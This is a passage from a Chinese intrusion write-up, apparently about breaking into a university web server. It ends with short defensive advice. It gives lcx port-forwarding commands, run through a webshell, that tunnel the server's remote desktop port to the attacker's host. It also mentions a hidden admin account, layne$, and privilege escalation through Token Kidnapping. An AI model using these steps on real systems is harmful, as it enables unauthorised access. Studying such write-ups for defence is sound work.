12.使用lcx转发端口

　　管理员组的账户layne$已经加了，那现在我们上传一个免杀的lcx到服务器，在本地把我路由的1987端口映射到我自己的计算机上，然后用lcx在本地监听1987端口，命令为lcx –listen 1987 110 ,然后再服务器上用webshell执行“D:\jingguan3\jingguan\lcx.exe –slave 116.217.***.** 1987 127.0.0.1 3389”，等待一会，本地监听成功，如图15所示。

　　图15使用lcx转发3389端口

　　13.成功进入远程桌面管理

　　好了，现在1987端口已经监听成功，现在连接本地110端口，输入我的账号和密码，登录成功，如图16所示。

　　图16成功进入远程桌面管理

　　14.总结

　　这次检测的整个流程是：在对注入和一般后台进行猜解，猜解失败后，利用google强大的搜索引擎功能搜索出一个隐蔽的管理后台，并用功能较多密码进入得到webshell，然后利用MS Windows Token Kidnapping成功提权，最后利用lcx的端口转发功能成功登录对方服务器。

　　防范措施

　　(1)网站的服务器首先应该派专职技术人员定向管理，而这正是中国大学网站最为不重视的地方。试想一个并不精通相关技术的人员怎么能管理好自己的服务器？

　　(2)无论是有多少分站一定要统一管理，否则人各管一站，松散如诸侯列国，肯定会出漏洞。

　　(3)及时关注微软最新漏洞，并打好相关补丁，严格设置服务器目录权限。